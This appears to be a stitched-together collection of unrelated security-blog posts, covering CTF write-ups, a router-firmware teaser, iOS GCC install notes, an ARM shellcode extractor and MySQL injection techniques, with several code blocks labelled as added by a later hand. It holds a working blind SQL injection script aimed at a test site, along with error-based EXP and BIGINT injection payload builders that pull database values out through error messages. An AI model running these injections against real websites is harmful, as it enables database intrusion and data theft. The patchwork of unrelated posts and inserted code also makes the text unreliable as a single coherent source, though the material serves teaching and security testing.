How to Turn Your Switch into a Snitch

Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.

This post is all about modifying your existing router firmware to perform cool things.

Hardware and Tools Needed:

For the router, I am using a TP-Link MR3020. You may use whatever router you like, but make sure you won't brick your device while or after uploading the modified firmware. Also make sure your firmware image can be extracted and rebuilt using the FMK (Firmware Mod Kit), since that is how the modified image will be produced.

Download Firmware Mod Kit

Solving Root-Me XORed Picture Challenge

Here's a cool challenge by Ryscrow on Root-Me. The challenge says:

For this challenge you will need to decipher a simple XORed picture. This BMP picture was mistakenly encrypted. Can you recover it?

The file is named "ch3.bmp"; let's open it in a hex editor and see. Inspecting the first 20 bytes, we can see the string "fallen" repeating where the BMP header should be. I guessed that this is the key, of length 6, since the header of a BMP is largely predictable and a repeating XOR key shows through it.
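The known-plaintext idea behind that guess, as an added Python example that is not part of the original write-up: the first 18 bytes of a 24-bit BMP with a BITMAPINFOHEADER are predictable ("BM", the file size, two zero words, the pixel offset 54 and the DIB size 40), and XOR preserves length, so XORing the ciphertext against that expected header yields key stream; the shortest key length at which that stream repeats consistently is the key. The tiny sample image and the key "fallen" are constructed here so the code runs offline; the header layout is an assumption about the challenge file.

```python
import struct

def build_bmp(width, height, rows):
    """Constructed sample: a 24-bit BMP (BITMAPINFOHEADER) from rows of (b, g, r)."""
    row_size = (width * 3 + 3) & ~3              # pixel rows are padded to 4 bytes
    pixels = bytearray()
    for row in rows:
        data = b"".join(bytes(p) for p in row)
        pixels += data + b"\x00" * (row_size - len(data))
    file_size = 14 + 40 + len(pixels)
    file_header = b"BM" + struct.pack("<IHHI", file_size, 0, 0, 54)
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                             len(pixels), 2835, 2835, 0, 0)
    return bytes(file_header + dib_header + pixels)

def xor_repeat(data, key):
    """XOR with a repeating key; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def expected_header(file_size):
    """The 18 bytes such a BMP always starts with (assumed layout): 'BM', the
    file size (XOR keeps the length, so it is known from the ciphertext),
    two reserved zero words, pixel offset 54, DIB header size 40."""
    return b"BM" + struct.pack("<IHHII", file_size, 0, 0, 54, 40)

def recover_key(ciphertext):
    """Known-plaintext attack: derive key stream from the header bytes, then
    return the shortest prefix that repeats consistently over all 18 bytes."""
    known = expected_header(len(ciphertext))
    stream = bytes(c ^ p for c, p in zip(ciphertext, known))
    for klen in range(1, len(known) + 1):
        candidate = stream[:klen]
        if all(stream[i] == candidate[i % klen] for i in range(len(known))):
            return candidate
    return None

if __name__ == "__main__":
    plain = build_bmp(2, 2, [[(0, 0, 255), (0, 255, 0)], [(255, 0, 0), (255, 255, 255)]])
    enc = xor_repeat(plain, b"fallen")      # key assumed from the challenge
    key = recover_key(enc)
    print(key, xor_repeat(enc, key) == plain)
```

The consistency check is what distinguishes a 6-byte key from a 1-, 2- or 3-byte one: a wrong length produces a key stream that contradicts itself somewhere inside the 18 known bytes, so only key lengths up to 17 can be confirmed this way; longer keys need more known plaintext (the rest of the DIB header, or the zero padding at the end of each pixel row).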


Automated Blind SQL Injector

There are lots of tools available for blind injection, but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib.parse
import urllib.request

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2'  # target
payload = '(select user())'  # your payload
trueString = 'Blad3'  # text or HTML present only in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    found = False
    for j in range(32, 127):
        # MySQL compares strings case-insensitively by default, so
        # uppercase letters need not be tried separately
        if chr(j).isupper():
            continue
        # compare one character of the payload's value against a hex literal
        sql = " and substring(" + payload + "," + str(i) + ",1)=" + hex(j) + "-- -"
        req = urllib.request.Request(url + urllib.parse.quote(sql))
        # If cookies are needed
        # req.add_header('Cookie', 'value=1;value=2')
        html = urllib.request.urlopen(req).read().decode('utf-8', 'ignore')
        if trueString in html:
            print('Found: ' + chr(j))
            result += chr(j)
            found = True
            break  # move on to the next character position
    if not found:
        break  # no character matched: the value has ended
print(result)


Error Based SQL Injection Using EXP

Overview

This is another overflow-based error injection in MySQL that I found, this time in the DOUBLE data type. You can refer to my previous post on BIGINT overflow error-based injections if you want to understand how overflows can be used to extract data; the queries here are similar to those in that post. Looking at MySQL's functions, I was interested in the mathematical ones, since they too need some data type to hold their results. So I went on testing for functions that would cause overflow errors, and I found that exp() raises a DOUBLE overflow error when passed a value above 709.

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

exp() is the inverse of MySQL's ln() and log() functions: exp(x) returns e raised to the power x. Briefly, ln() and single-argument log() both return the natural logarithm, that is, the logarithm to the base e, where e is approximately $latex e \approx 2.71828183$.

$latex \ln(15) = \log_{e}(15) = 2.70805020110221$

so that $latex \exp(2.70805020110221) = e^{2.70805020110221} = 15$.

Installing GCC on iOS 8

I recently entered the world of mobile security and pen-testing. I wanted to install GCC on a jailbroken iOS 8.3 device and had to face lots of issues in finding the correct package for it. I somehow managed to install it and run my own C apps 🙂 I thought of sharing this with you; if you are struggling like me, here's how I managed to install it.

First install OpenSSH and essential command-line tools such as apt-get, sed, ps, etc. After that you have to install a few Debian packages along with gcc. Download this zip file I made and drop it into any folder on your iPhone using an SFTP connection or a desktop file browser. Then, from that folder, install all the packages in it.

[code language="bash"]
$ dpkg -i *.deb
[/code]

BIGINT Overflow Error Based SQL Injection

Overview

I was interested in finding new techniques for extracting data via MySQL errors. This is a detailed write-up that will make you understand how I came up with these queries. Looking at how MySQL handles integers, I was interested in causing overflows. This is how MySQL stores integers:

[Figure: table of MySQL integer types with their storage size in bytes and signed/unsigned ranges. Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html]
These overflow errors are raised only in MySQL versions 5.5.5 and above; in earlier versions an integer overflow results in a silent wraparound.
The BIGINT data type is 8 bytes in size, i.e. 64 bits. The maximum signed BIGINT value is "0b0111111111111111111111111111111111111111111111111111111111111111", "0x7fffffffffffffff" or "9223372036854775807" in binary, hex and decimal respectively. Evaluating an arithmetic expression on this value, such as adding 1 to it, causes a "BIGINT value is out of range" error.

mysql> select 9223372036854775807+1;
ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'
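The two error-based techniques above (exp() overflowing DOUBLE, and BIGINT arithmetic overflowing) share one mechanism: the injected subquery is evaluated first, and the resulting out-of-range error quotes the expression with the evaluated value in it. As an added Python example, not from either post, the block below reproduces the arithmetic that triggers each overflow (MySQL's `~` works on BIGINT UNSIGNED, so `~0` is 2^64-1; `exp()` above about 709.78 exceeds a double), builds the corresponding payloads, and parses the leaked value out of the error text. The error strings are constructed samples in the shape of MySQL 5.5.x ERROR 1690 messages, which is an assumption about the exact wording, and "root@localhost" is a made-up value.

```python
import math
import re

MASK64 = 0xFFFFFFFFFFFFFFFF

def mysql_bitnot(value):
    """MySQL's ~ operates on BIGINT UNSIGNED, so ~0 is 2**64 - 1, not -1."""
    return (~value) & MASK64

def exp_overflows(x):
    """True when exp(x) exceeds the DOUBLE range, as MySQL's exp() does above ~709.78."""
    try:
        math.exp(x)
        return False
    except OverflowError:
        return True

def bigint_unsigned_in_range(value):
    return 0 <= value <= MASK64

def exp_payload(subquery):
    # ~(string) is evaluated as ~0 = 18446744073709551615; exp() of that overflows
    return "exp(~(select*from(" + subquery + ")x))"

def bigint_payload(subquery):
    # !(string) is 0 or 1; subtracting ~0 from it leaves the BIGINT UNSIGNED range
    return "!(select*from(" + subquery + ")x)-~0"

# Constructed samples (assumed wording): the server echoes the rewritten
# expression, including the evaluated subquery, inside the quotes.
SAMPLE_ERRORS = [
    "ERROR 1690 (22003): DOUBLE value is out of range in "
    "'exp(~((select 'root@localhost' from dual)))'",
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in "
    "'((not((select 'root@localhost' from dual))) - ~(0))'",
]

LEAK_RE = re.compile(r"\(select '((?:[^']|'')*)' from dual\)")

def extract_from_error(message):
    """Return the value leaked by an overflow error, or None if there is none."""
    if "value is out of range" not in message:
        return None
    m = LEAK_RE.search(message)
    return m.group(1).replace("''", "'") if m else None

if __name__ == "__main__":
    print(exp_payload("select user()"))
    print(bigint_payload("select user()"))
    for err in SAMPLE_ERRORS:
        print(extract_from_error(err))
```

The `select*from(...)x` wrapper matters: it turns the subquery into a derived table, which is what gets evaluated and then printed back in the error message; a bare `(select user())` would be folded into the expression text without its value. The error text is limited in length, so long values are extracted in pieces with substring(), exactly as in the blind injector above.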


Getting Shellcode from ARM Binaries

For x86 and x86_64 there are already one-liners for extracting shellcode from objdump output and printing it nicely formatted. But when it comes to ARM, none of them would work because of the way objdump dumps the opcodes: each ARM instruction is printed as one 32-bit word and each Thumb instruction as one 16-bit halfword, rather than byte by byte, so the bytes also have to be reversed for a little-endian target. For example, if this is my sample program:

.section .text
.global _start
_start:
.code 32
# Thumb-Mode on
add r6, pc, #1
bx r6
.code 16
# _write()
mov r2, #7
mov r1, pc
add r1, #12
mov r0, $0x1
mov r7, $0x4
svc 0
# _exit()
sub r0, r0, r0
mov r7, $0x1
svc 0
.ascii "Osanda\n"
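A parser for that objdump layout, as an added Python example that is not part of the original post: it collects the opcode column, byte-reverses every word or halfword (a no-op for the 2-character tokens x86 objdump prints, so the same code serves both), and reports which offsets hold null bytes, since `svc 0` encodes with a 0x00 low byte. The listing it runs on is a constructed sample for the program above with assumed encodings, not objdump output captured from the author's build.

```python
import re

# Constructed sample of `objdump -d` output for the program above (assumed
# encodings). ARM words at 0 and 4, Thumb halfwords from 8, then the string.
SAMPLE_OBJDUMP = """
00000000 <_start>:
   0:\te28f6001 \tadd\tr6, pc, #1
   4:\te12fff16 \tbx\tr6
   8:\t2207      \tmovs\tr2, #7
   a:\t4679      \tmov\tr1, pc
   c:\t310c      \tadds\tr1, #12
   e:\t2001      \tmovs\tr0, #1
  10:\t2704      \tmovs\tr7, #4
  12:\tdf00      \tsvc\t0
  14:\t1a00      \tsubs\tr0, r0, r0
  16:\t2701      \tmovs\tr7, #1
  18:\tdf00      \tsvc\t0
  1a:\t6e61734f \t.word\t0x6e61734f
  1e:\t6164      \t.short\t0x6164
  20:\t0a        \t.byte\t0x0a
"""

# address, tab, hex tokens of 8/4/2 digits, then a tab before the mnemonic
LINE_RE = re.compile(r"^\s*[0-9a-f]+:\t([0-9a-f ]+?)\s*(?:\t|$)")

def objdump_to_bytes(listing):
    """Collect the opcode column, byte-reversing each word/halfword."""
    out = bytearray()
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                            # labels, blank lines, headers
        for token in m.group(1).split():
            out += bytes.fromhex(token)[::-1]   # little-endian byte order
    return bytes(out)

def to_c_string(data):
    """Format as the usual \\x.. escape string for a C test harness."""
    return "".join("\\x%02x" % b for b in data)

def find_bad_chars(data, bad=b"\x00"):
    """Offsets of bytes that would break a string-copy delivery."""
    return [i for i, b in enumerate(data) if b in bad]

if __name__ == "__main__":
    sc = objdump_to_bytes(SAMPLE_OBJDUMP)
    print(len(sc), "bytes:", to_c_string(sc))
    print("null bytes at", find_bad_chars(sc))
```

The offsets also confirm the PC arithmetic in the source: `mov r1, pc` at 0xa reads 0xe (Thumb pc is the instruction address plus 4), and `add r1, #12` lands on 0x1a, which is where the "Osanda\n" string starts in the sample listing.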


Solving Root-me Ptrace challenge

You can find the challenge here. The challenge is to find the password for a 32-bit ELF binary. This is how it looks at a glance.

[Figure: the challenge binary at a glance]
Let's fire up GDB and check this out. I'll break on main and run. We can see the arguments to the ptrace() function being pushed onto the stack (right to left, so the first argument is the last one pushed) and ptrace being called. The request argument is 0, i.e. PTRACE_TRACEME, the classic anti-debugging check: it fails when the process is already being traced by a debugger.

=> 0x080483fe <+14>: sub esp,0x14
0x08048401 <+17>: mov DWORD PTR [ebp-0xc],0x80c2888
0x08048408 <+24>: push 0x0
0x0804840a <+26>: push 0x1
0x0804840c <+28>: push 0x0
0x0804840e <+30>: push 0x0
0x08048410 <+32>: call 0x8058a70 <ptrace>
